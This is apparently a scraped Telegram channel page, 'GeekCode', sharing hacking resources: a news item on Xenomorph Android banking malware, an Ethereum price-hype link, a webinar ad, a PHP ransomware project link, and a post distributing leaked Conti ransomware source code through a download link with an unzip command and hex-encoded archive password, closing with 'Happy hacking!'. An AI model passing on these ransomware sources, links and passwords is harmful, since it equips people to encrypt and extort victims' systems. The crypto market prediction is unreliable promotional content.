GeekCode
797 subscribers
452 photos
3 videos
7 files
942 links
🍁Cyber Security ❤️
🍁Hacking Resources 👨‍💻

Providing knowledge to people's🥀
Nobody gets smaller by sharing knowledge
You can also share your knowledge with us...🙂🙂

📰Promotion/Query - @geekcodevipbot
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
Harmful malware detected on Google Play

A dangerous Android virus Xenomorph was found on Google Play, according to the official blog of ThreatFabric security company.

The malware hides in the Fast Cleaner app. It has already managed to infect over 50,000 devices.

Once on the victim's device, Xenomorph tries to get hold of important financial data, gain control over the victim's accounts and carry out unauthorized transactions. The malware's operators then sell all the information gathered to concerned parties.

@geekcode
This media is not supported in your browser
VIEW IN TELEGRAM
Ethereum to Reach Trillion Dollar Marketcap This Bull Run

https://www.analyticsinsight.net/ethereum-to-reach-trillion-dollar-marketcap-this-bull-run/

join us ❤️ @geekcode
This media is not supported in your browser
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
#webinar #BigData

Webinar name: Dynamic Talks #85 | Build and execute Snowflake pipelines with Snowpark in Scala

Date April 21

Time 7:00 pm (CEST)

URL - https://fb.me/e/nlI8Ranx5

REGISTER HERE - https://forms.gle/QgQ9JvZyHCobY1789

@geekcode
This media is not supported in your browser
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
PHP Ransomware


PHP ransomware that encrypts your files, as well as file and directory names.

Ransomware is set to start encrypting files and directories from the server's web root directory and only inside the server's web root directory.

Ransomware will self-destruct upon running, which means you only have one chance at decrypting your data.

Keep also in mind that each decryption file has a uniquely generated salt used in encryption and as such cannot be replaced with another decryption file.

https://github.com/ivan-sincek/php-ransomware
@geekcode
This media is not supported in your browser
VIEW IN TELEGRAM
Conti Ransomware Source Code Hi everyone. Here are some source codes belonging to the Conti group, with the locker, the decrypter, ...
Link :
https://anonfiles.com/lfV7c2L8xa/conti_locker_v2_zip
The password was bruteforce :
#unzip -P $(echo $'\x27\x3b\x23\x70\x5d\x65\x28\x64\x3e\x4\xa8\x03\xdc\x47') conti_locker_v2.zip

Happy hacking !
This media is not supported in your browser
VIEW IN TELEGRAM